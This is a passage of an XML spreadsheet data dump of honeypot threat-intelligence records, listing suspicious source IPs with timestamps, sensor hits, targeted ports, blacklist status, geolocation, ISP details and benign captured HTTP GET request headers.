    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc84:953d"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3839"/>
    <x v="3839"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T05:27:26"/>
    <d v="2025-03-31T14:28:39"/>
    <d v="2025-04-01T05:27:26"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:ac2e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3840"/>
    <x v="3840"/>
    <s v="218-161-97-71.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T05:22:39"/>
    <d v="2024-06-14T10:21:39"/>
    <d v="2025-04-01T05:22:39"/>
    <n v="936"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;33479&amp;&amp;NA&amp;&amp;23&amp;&amp;80&amp;&amp;47778&amp;&amp;9100&amp;&amp;56581"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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daa1:6147"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3841"/>
    <x v="3841"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T05:07:12"/>
    <d v="2025-03-17T23:22:48"/>
    <d v="2025-04-01T05:07:12"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="64"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="43"/>
    <s v="North Chungcheong"/>
    <s v="Cheongju-si"/>
    <s v="Cheongju-si (Ochang-eup)"/>
    <s v="1845604"/>
    <s v="NA"/>
    <s v="36.7337"/>
    <s v="127.422"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2003-10-27"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:de74:b432"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3842"/>
    <x v="3842"/>
    <s v="NA&amp;&amp;59-126-176-150.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T04:57:39"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-01T04:57:39"/>
    <n v="460"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;9100&amp;&amp;8024"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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3b7e:b096"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3843"/>
    <x v="3843"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T04:48:32"/>
    <d v="2025-04-01T03:53:03"/>
    <d v="2025-04-01T04:48:32"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SK"/>
    <s v="Slovakia"/>
    <s v="BL"/>
    <s v="Bratislava Region"/>
    <s v="NA"/>
    <s v="Bratislava"/>
    <s v="3060972"/>
    <s v="810 00"/>
    <s v="48.1486"/>
    <s v="17.1077"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="Cdnext BRA"/>
    <s v="1990-05-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8ac7:2291"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3844"/>
    <x v="3844"/>
    <s v="1-34-58-99.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T04:47:16"/>
    <d v="2024-05-24T19:23:13"/>
    <d v="2025-04-01T04:47:16"/>
    <n v="589"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H42&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;17841&amp;&amp;23&amp;&amp;18940&amp;&amp;36706&amp;&amp;NA&amp;&amp;9100&amp;&amp;41991&amp;&amp;41998"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:3a63"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3845"/>
    <x v="3845"/>
    <s v="NA&amp;&amp;114-33-107-149.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T04:37:59"/>
    <d v="2024-04-12T15:21:00"/>
    <d v="2025-04-01T04:37:59"/>
    <n v="691"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="22972&amp;&amp;23&amp;&amp;9100"/>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
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:6b95"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3846"/>
    <x v="3846"/>
    <s v="NA&amp;&amp;114-35-199-237.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T04:16:52"/>
    <d v="2024-12-24T09:20:23"/>
    <d v="2025-04-01T04:16:52"/>
    <n v="188"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23&amp;&amp;80"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:c7ed"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3847"/>
    <x v="3847"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T04:11:10"/>
    <d v="2025-04-01T04:11:10"/>
    <d v="2025-04-01T04:11:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="TO"/>
    <s v="Tocantins"/>
    <s v="Palmas"/>
    <s v="Palmas"/>
    <s v="3474574"/>
    <s v="NA"/>
    <s v="-10.1674"/>
    <s v="-48.3277"/>
    <s v="8167"/>
    <s v="AS8167"/>
    <s v="V tal"/>
    <s v="corporate"/>
    <s v="V tal"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb35:b86c"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3848"/>
    <x v="3848"/>
    <s v="114-33-107-213.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T04:06:26"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T04:06:26"/>
    <n v="527"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;2888&amp;&amp;23&amp;&amp;9100&amp;&amp;56444&amp;&amp;56457&amp;&amp;56467&amp;&amp;NA"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:6bd5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3849"/>
    <x v="3849"/>
    <s v="NA&amp;&amp;59-127-155-16.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T04:02:19"/>
    <d v="2024-04-17T10:45:16"/>
    <d v="2025-04-01T04:02:19"/>
    <n v="299"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;50959&amp;&amp;17056&amp;&amp;9100&amp;&amp;54952"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
